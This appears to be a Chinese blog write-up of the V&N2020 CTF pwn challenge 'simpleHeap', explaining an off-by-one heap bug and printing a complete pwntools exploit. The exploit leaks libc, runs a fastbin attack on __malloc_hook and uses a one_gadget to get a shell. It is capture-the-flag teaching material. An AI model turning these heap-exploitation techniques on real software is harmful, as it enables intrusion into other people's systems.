【pwn】V&N2020 公开赛 simpleHeap
2024-09-07 13:46:28
【pwn】V&N2020 公开赛 simpleHeap
1、静态分析
首先libc版本是ubuntu16的2.23版本,可以去buu的资源处下载
然后checksec一下,保护全开
拖入IDA中分析
去除了符号表,通过menu函数分析出有add、edit、show、delete
1.add()
add函数分析一遍,发现没什么漏洞,就是普普通通的输入一个需要申请的size(空间大小),然后再向这个malloc的空间中输入content(内容),其中size不能大于111(0x6F)。
2.edit()
edit的功能就是输入一个index,然后修改这个index的内容。
问题出在了in(我自己重命名的)这个函数上,这个函数的功能是给prt[index]读入Size[index]大小的内容,但是我们进入这个函数看一看
其中红框的部分造成了off-by-one的漏洞,如果i == length那么其实会多写入一个字节,利用这个漏洞我们可以去篡改物理相邻的下一个chunk的size字段的最后一个字节,也就是给这个chunk的size给重写
3.show()
show函数就是把我们想要的index的content打印出来
没有漏洞存在
4.delete()
delete函数不仅free了ptr,还把ptr置为了NULL,不存在UAF和double free的漏洞
2、漏洞利用
分析完了上述的4种主要函数,发现能够利用的漏洞只有edit中的off-by-one一个点。那么如何通过这一个off-by-one的漏洞来获取shell呢?
exp如下:
from pwn import *
from LibcSearcher import *
# context.log_level="DEBUG"
def ret2libc(leak,func,path=""):
if path == "":
libc = LibcSearcher(fun,leak)
base = leak - libc.dump(func)
system = base + libc.dump("system")
binsh = base + libc.dump("str_bin_sh")
else:
libc = ELF(path)
libc.address = leak - libc.sym[func]
system = libc.sym["system"]
binsh = next(libc.search(b"/bin/sh"))
return (system,binsh)
s = lambda data : io.send(data)
sa = lambda str1,data : io.sendafter(str1,data)
sl = lambda data : io.sendline(data)
sla = lambda str1,data : io.sendlineafter(str1,data)
r = lambda num : io.recv(num)
ru = lambda data,drop=True : io.recvuntil(data,drop)
ia = lambda : io.interactive()
uu32 = lambda data : u32(data.ljust(4,b"\x00"))
uu64 = lambda data : u64(data.ljust(8,b"\x00"))
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
dbg = lambda : gdb.attach(io)
# io = process("./vn_pwn_simpleHeap")
io = remote("node4.buuoj.cn",27610)
elf = ELF("./vn_pwn_simpleHeap")
libc = ELF("./libc-2.23.so")
def add(size,content="a"):
sla(":","1")
sla("?",str(size))
sa(":",content)
def edit(index,content):
sla(":","2")
sla("?",str(index))
sla(":",content)
def show(index):
sla(":","3")
sla("?",str(index))
def free(index):
sla(":","4")
sla("?",str(index))
# start
add(0x18) # 0
add(0x68) # 1
add(0x68) # 2
add(0x18) # 3
edit(0,b"a"*0x18+b"\xe1") # 篡改1的size为e1,欺骗unsoted bin回收 1和2 这一个整体
free(1) # unsorted bin 回收了 1和2 这一块内存空间,但是 2 的指针仍然存在
add(0x68) # 将 1 从unsorted bin中分割出来,剩下的一半2仍然再unsorted bin中,用来泄露libc
show(2) # 用 2 来泄露main arean的地址,再减去0x10泄露出malloc_hook的地址,进而泄露出libc地址
base = uu64(r(6))- 88 - 0x10 - libc.sym["__malloc_hook"]
leak("base",base)
malloc_hook = base + libc.sym["__malloc_hook"]
add(0x60) # 4 <-> 2
free(3)
free(2)
edit(4,p64(malloc_hook-0x23)) # 将 2 的fd指针改为 malloc_hook - 0x23,这里其实是一个欺骗fastbin的位置,因为这里的size是0x7f,属于fastbin的范围
add(0x60) # 将 2 重新申请回来,此时的2的fd指针已经改写为了fake chunk的地址
payload = b"a"*11+p64(base+0x4526a)+p64(base+libc.sym["__libc_realloc"]+0xc) # 通过one_gadget来获取shell,但是这里选择的one_gadget rsp+0x30 == null无法满足,所以要去realloc中通过push、pop操作(也就是rsp+0x30-5*8==null)来满足条件,最后将one_gadget写入realloc_hook中
add(0x60,payload)
sla(":","1")
sla("?","1") # malloc发现malloc_hook不为空,去调用malloc_hook里面的realloc+0xc,realloc发现realloc_hook不为空,可以执行realloc下面一系列的pop操作,调节了栈帧,满足了one_gadget的条件,最后调用了realloc_hook中的one_gadeget从而获取了shell
ia()
最新文章
- 智软科技医疗器械GSP监管软件通过多省市药监局检查
- .NET程序员转Java不完全指南
- flex布局模式简单概述
- I2C控制器的Verilog建模之三(完结版)
- 7 Types of Regression Techniques you should know!
- Tortoisesvn单个文件夹checkout
- 【总结】OJ练习,进行的一些编程语言方面总结
- 关于Oracle将小于1的数字to_char后丢掉0的解决办法
- 关于Python的self指向性
- [LeetCode]题解(python):065-Valid Number
- ecstore中kvstore之memcached
- java中的i++和++i区别
- Error: Failed to launch instance &;quot;win7&;quot;: Please try again later [Error: No valid host was found. ].
- MySQL数据库 Too many connections
- Apache:SSLCertificateFile:文件不存在或为空(操作系统RHEL7)
- JQ remove()方法实现似收货地址逐一删除的效果
- 拦截器、过滤器、@Aspect 区别
- Python3正则表达式(4)
- java - 线程等待与唤醒
- 09 ORM 多表操作,创建表,添加记录
热门文章
- 2021 .NET 开发者峰会顺利在网上落幕,线上直播回看汇总
- 前端文本框插件KindEditor
- 大小端(内存、寄存器、CPU)
- python爬取信息到数据库与mysql简单的表操作
- 【九度OJ】题目1087:约数的个数 解题报告
- 【LeetCode】268. Missing Number 解题报告(Java & Python)
- 【LeetCode】207. Course Schedule 解题报告(Python)
- 【LeetCode】386. Lexicographical Numbers 解题报告(Python)
- 【stm32】基于hal库使用野火指南者esp8266 WIFI模块进行TCP传输
- Feign动态调用,结合Ribbon